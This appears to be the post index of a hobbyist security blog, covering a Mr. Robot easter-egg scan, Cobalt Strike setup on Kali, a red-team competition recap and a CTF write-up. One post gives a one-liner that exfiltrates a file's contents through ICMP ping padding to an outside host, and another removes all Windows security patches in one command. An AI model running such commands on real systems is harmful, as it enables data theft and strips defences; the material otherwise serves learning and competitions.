Posts

  1. Mr. Robot Season 2 Episode 4 Easter Egg


    After seeing the last Mr. Robot easter egg from season 2 episode 1 I have been on the lookout for IP's and domains to try and go after. At the end of season 2 episode 4 (init_1.asec) Elliot logs into an IRC server and the IP address is clearly visible as 192.251.68.53. ip

    I decided to scan that host with nmap and got the following results:

    → sudo nmap -sS -Pn -sV -n 192.251.68.253
    Starting Nmap 7.12 ( https://nmap.org ) at 2016-07-28 08:46 EDT
    Nmap scan report for 192.251.68.253
    Host is up (0.023s latency).
    Not shown: 996 filtered ports
    PORT     STATE SERVICE     VERSION
    21/tcp   open  ftp?
    80/tcp   open  http-proxy  F5 BIG-IP load balancer http proxy
    554/tcp  open  rtsp?
    7070/tcp open  realserver?
    Service Info: Device: load balancer
    

    HTTP up, cool. I went to the site and it was a fake IRC server with the hostname irc.colo-solutions.net: irc

    After it logged me in as D0loresH4ze I was dropped in a channel called #th3g3ntl3man with the all too familiar samsepi0l (for the uninformed, Sam Sepiol was the alias Elliot used in season one to gain access to Steel Mountain, a secure datacenter).

    After poking around and trying to get samsepi0l to say something besides "i don't have time for this right now." I played the roll of Darlene and entered what she said in the show: input

    Here is the respone I got: response

    they have changed their standard issue. we have a way in.

    What does that even mean? At the end of the episode this line of dialogue was not shown. Only wait for my instructions was. The scene after shows a news article from Business Insider titled FBI gives up Blackberry for Android. I assume that is their "standard issue" and he is going to hack into them via their smartphones. That's a bold move, we'll see how it plays out next week.

    After this I investigated a couple of other addresses I found (192.251.68.240, 104.97.14.93, 192.251.68.249, irc.eversible.co) but none of them turned up anything. I looked at the page source too, hoping to find something hidden in the javascript or HTML. Nothing there either... I guess we will just have to wait and see where this goes! I'll probably take a closer look at this after work, but I thought this would be cool to share now.

  2. Metasploit Workflows and Scripting


    Here is a presentation I gave at GVSU on 7/20/16 about the basics of metasploit and automation using pymetasploit

    The code for autopsexec is not public right now because it is a mess. I'll update this post when I fix it!

  3. Data Exfiltration with Ping


    I was looking around Twitter the other day and someone had posted something similar to this. I don't remember who you are, but this is a neat trick so I wanted to share it. How to exfiltrate data from a network using the padding of ICMP echo request packets.

    Sending data

    base64 important-data.txt | xxd -ps -c 16 | while read i; do ping -c1 -s32 -p $i 8.8.8.8; done
    

    This will base64 encode important-data.txt and then stuff the encoded data 16 bytes at a time into ping.

    Obviously you should change the IP before sending :)

    Receiving data

    You can grab the data off the wire using scapy. Here's a short little script that takes an out file name as the first argument and then an optional interface name to listen on as the second argument.

    That's all for now.

  4. Hello World


    Finally finished this new blog. It's all static now so that's good.

    I was on wordpress before and it was terrible. Hopefully I can put some cool stuff here!

  5. iPhone: Installing apt without a gui


    Usually to get apt you need to launch Cydia. If you only have an ssh connection in and would like apt you can go to http://apt.saurik.com/debs/ and grab berkeleydb_4.6.21-5_iphoneos-arm.deb and apt7_0.7.25.3-8_iphoneos-arm.deb. Scp them over and run dpkg -i apt7_0.7.25.3-8_iphoneos-arm.deb then dpkg -i berkeleydb_4.6.21-5_iphoneos-arm.deb. There you go. You can apt-get all of the things now.

  6. Uninstall all installed windows KB patches in one line of batch


    I was trying to unpatch something to make it vulnerable and I was getting impatient trying to uninstall the correct patch so I got creative and came up with a one liner to uninstall all of them at once. Or at least all of the ones with working uninstallers and don't have other dependencies... The uninstallers are all called spuninst.exe and are somewhere in \\WINDOWS (under a bunch of sub folders that start with $NtUninstall) so I give you the following command:

    for /F %a in ('dir /B /S /A \\WINDOWS ^\| findstr spuninst.exe ^\| findstr NtUninstall') do @(echo %a && %a /quiet /norestart)
    

    Keep running this until it does not print anything and then all of the patches will be gone on reboot. Happy unpatching

    ... bonus

    for /L %b in (0,0,1) do @for /F %a in ('dir /B /S /A \\WINDOWS ^\| findstr spuninst.exe ^\| findstr NtUninstall') do @(echo %a && %a /quiet /norestart)
    

    Just keep running that until the screen is blank

  7. Cobalt Strike 2.4 on Kali 2.0


    Cobalt Strike 3.0 came out lacking metasploit integration. Also, Cobalt Strike 2.4 (grab that here if you need it) doesn't work with the version of Metasploit that is built into Kali 2.0. That's okay, because you can still compile the metasploit framework to work with Cobalt Strike 2.4.

    curl -sSL https://get.rvm.io \| bash -s stable
    source /usr/local/rvm/scripts/rvm
    apt-get install libpq-dev libpcap-dev
    service postgresql start
    msfconsole
    exit (this was to make sure the msf database was created)
    rvm install 1.9.3
    cd /usr/share
    git clone https://github.com/rapid7/metasploit-framework cs-msf
    cd cs-msf
    git checkout dc48987
    rvm use 1.9.3
    bundle install
    for i in msf*;do update-alternatives --install /usr/bin/$i $i $PWD/$i 1;done
    cd ../metasploit-framework
    for i in msf*;do update-alternatives --install /usr/bin/$i $i $PWD/$i 2;done
    rm -rf $(dirname $(which msfconsole))/msf*
    update-alternatives --config msfrpcd < <(echo 1)
    cp /usr/share/metasploit-framework/config/database.yml /usr/share/cs-msf/config
    export MSF_DATABASE_CONFIG=/usr/share/cs-msf/config/database.yml
    

    Then, edit the database.yml file @ /usr/share/cs-msf/config/database.yml:

    • Delete the &pgsql after development
    • Delete all profiles after development (after first line with nothing on it)
    • Change development to production (1st line)
    • Save the file
    You should now be able to run cobalt strike 2.4 just fine.

    To switch back just open a new terminal OR:

    update-alternatives --config msfrpcd < <(echo 0)
    rvm use system
    

    And the next time you want to use 2.4 (put this in a script):

    \#!/bin/bash
    source /usr/local/rvm/scripts/rvm
    rvm use 1.9.3
    update-alternatives --config msfrpcd < <(echo 1)
    export MSF_DATABASE_CONFIG=/usr/share/cs-msf/config/database.yml 
    ./cobaltstrike &>/dev/null &disown
    read -p "Press enter once the RPC server has started up..." i
    update-alternatives --config msfrpcd < <(echo 0)
    

    I'm pretty sure there is a more elegant way to do this rather than using update-alternatives... but this works for now. As a side note... tracking down the exact revision where ruby 2.1 became a dependency was terrible. Yes, this is the absolute LAST commit you can get and compile without ruby 2.1. I might update this with a solution for later versions of metasploit before the MsgPack library update (which breaks cobaltstrike much more than I'm willing to fix!).

  8. WMCSC Red vs. Blue Competition 2015


    Today I had the pleasure of participating in the West Michigan CyberSecurity Consortium's (WMCSC's) annual red vs. blue competition. In April I received an email from one of my professors about red teaming for this event and was interested because I like red teaming. I thought the experience would be worth the money I had made at my internship, so I decided to come out here to play. I was certainly right about it being worth it; I have done a bit of red teaming before, but this was the first time I was doing something without any knowledge of the infrastructure. The team that was gathered was mostly centered in Michigan, with a few people from other areas like myself. We started collaborating in mid July so that we could form a game plan. There were 11 people total on our red team lead my Mr. Matt Carpenter of Grimm. We spent a week or so talking about strategies and tools and then were given access one week before the actual event to try and breach systems and put backdoors in place. This infrastructure was broken up into a few different parts: the school, the power plant, Alphaville, (one other one I can't remember right now), and our target Zenda. Zenda was supposedly a research company we were supposed to hack as the Kneebonian Mafia. The infrastructure for the competition was put together by Merit, a company that was developing networking technologies back when ARPANET was starting to be more heavily used and other networks were popping up. The company now (among other things) runs the Michigan Cyber Range, which was the infrastructure we were playing on.

    To gain access to the environment we had to log log onto Windows 7 machines via the VMWare Horizon View client, which connected to the Kali VMs via a remote service called NoMachine. Getting in was actually surprisingly easy, but I locked myself out a few times with a couple of dumb mistakes (I'll explain this in a second). The one disappointing aspect of this competition was that there was no internet within the environment, so we couldn't just go out and get tools and things without a bit of hassle. We ended up being able to upload packages to a web interface and access them from Kali, but this wasn't fully set up until Saturday or Sunday. We gained access to Kali on Thursday, but I didn't really end up doing much until I was able to get my toolset onto the box. They did not give us any IP address information, so I just tried scanning and poking at everything and eventually I ended up locking myself out twice, like I mentioned above. This is how I found out that I do stupid things when I'm not given targets!

    When I scanned and saw the exposed outside (local) network I was a bit disappointed: it was Windows XP, Server 2003, and a lot of Linux 2.X. I thought that was it; we were going to own everything and make blue team cry, and be done in 20 minutes... but I was so wrong. Not long after scans had finished I quickly gained access to five or six Windows XP/2003 machines on that outside local network which was known as Alphaville (the 10.0.3.0/24 network). Our Kali boxes were also on this network. This was Monday, so I spent the day planting myself deep into these boxes with Cobalt Strike's beacons and other shenanigans I like to do to maintain access. One of the boxes was a Server 2003 domain controller for the school network (192.168.40.0/24), which had many hosts underneath it. Unfortunately I was having trouble getting to them, so I moved on and attempted to crack passwords for a bit. I ended up importing ophcrack's XP free small tables into the environment and trying to use those. Since Cobalt Strike and metasploit were already hogging most of my RAM I ended up using OCR to get the hashes on my local box and cracked them using the XP special tables. Through credential re-use I gained access to the Linux machine that the library website was hosted on and planted backdoors on that.

    ...


    Check out the full post for more details!
  9. PoliCTF 2015 – John Pastry Shop – Pwnable 100 (aka how to make a pwndcake)


    This challenge was a pain in the ass, but it was still fun. It's funny that I really don't like java but I ended up solving the two java-based challenges in this CTF. Bleh. So this challenge had a set of files and a server to connect to. The files were Cake.java, Decode.java, and ShamanoCakeContainerEncoded.jar. The server was pastry.polictf.it 80. The description was

    Among his hobbies, John likes baking cakes to eat during the warm afternoons in Milan. He is damn good at this such that, a couple of months ago, he decided to open a pastry shop on his own. The shop was an immediate success and John needed to bake just so many cakes that he decided to outsource the production of his famous NewYorkCheeseCake to another external and trusted pastry shop, the Shamano's (see shamanoPastryShop.pem). John provided Shamano's with the original basic recipe of his Cake (see Cake.java) and, after his customization, Shamano returns to John a cake container holding the NewYorkCheeseCake (see ShamanoCakeContainerEncoded.jar). Notice that Shamano has to follow John's directions carefully and that is why he always have to encode properly his cake containers so that John can verify all of them accordingly to a fixed decoding process (see extract of source code in Decode.java). John always tries his best for verifying the quality and genuineness of the incoming NewYorkCheeseCake but, you know, to busy people, like he is, it may sometimes happen to forget to check something.
    So there is a Cake, a NewYorkCheeseCake, and a Decoder, that must be the three files. First, I wanted to see what the server would do upon sending it the ShamanoCakeContainerEncoded.jar file.

    nc pastry.polictf.it 80 < ShamanoCakeContainerEncoded.jar
    Welcome to John's Pastry Shop!
    In John's opinion this cake container seems a trusted one from Shamano's Pastry Shop.
    And it also contains a valid NewYorkCheeseCake.
    This seems a tasty cake!
    Here are its ingredients:
    * Cream Cheese
    * Biscuits
    * Sugar
    * Isinglass
    Thanks for visiting John's Pastry Shop!
    

    Since it said something about encoding I wanted to make sure it was a jarfile.

    file ShamanoCakeContainerEncoded.jar
    ShamanoCakeContainerEncoded.jar: data
    

    Alright so it's encoded like it says, the file command should say it is a zip file since jars are just zips. Good thing there is a Decoder! ... well, most of a decoder: ...


    Check out the full post for more details!